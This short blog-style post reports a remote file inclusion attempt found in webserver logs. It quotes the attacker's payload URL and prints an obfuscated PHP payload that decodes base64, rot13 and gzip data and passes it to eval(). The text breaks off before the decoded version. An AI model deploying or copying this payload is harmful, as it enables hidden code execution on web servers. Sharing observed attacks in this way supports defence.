1337 v0pCr3w - heh
Well, I thought this to be a humorous find in the webserver logs on a Monday afternoon.
It was an attempt to remotely load the following URL on the Aanval.com primary domain:
http://oubkhammuseum.com/templates/idvop.txt
The content of the URL (in the event is gets pulled):
$vopcrew = “pZLNd8MwEITvgbyDIgyWIZT059Q0xdBYYg30TRCOvIpIecl15cYh5N0ryWTSUCCH3sTMzrfDosQg
TJF8/b7mH5/L6QRRcgj9TLRi9mT3srGv9CwafEEMjk0immVSSBnfgLDtR0OgdMHJxtTF8spnIjstn
DKaxDkJ2cGnLYQOduonlCR5Blrr9oMdfCXZGOPQK2fIRehOpNHNwzMOzwMoLD4Bv43SjH52bTaOvk
eNYw2IFdQ1v2BCjPyiD4VhQ/booDkVMxuOrrCOhUM+S3TIyPdQW2NcGO1Ae1Gc9SLokosaCs1hrHk
LUUrZ7urS0fz32lwh90TTTAEskQHRmhb0Y2t3dvb3dzR8il2ld2CzXIKRPpJy5ECif+fD0k9EbWh+
v2trypbkGMqK2mCgx9VeseA6q3AoKL8=”;
eval(gzinflate(str_rot13(base64_decode($vopcrew))));
exit;
And of course, the decoded PHP version that they would prefer to [...]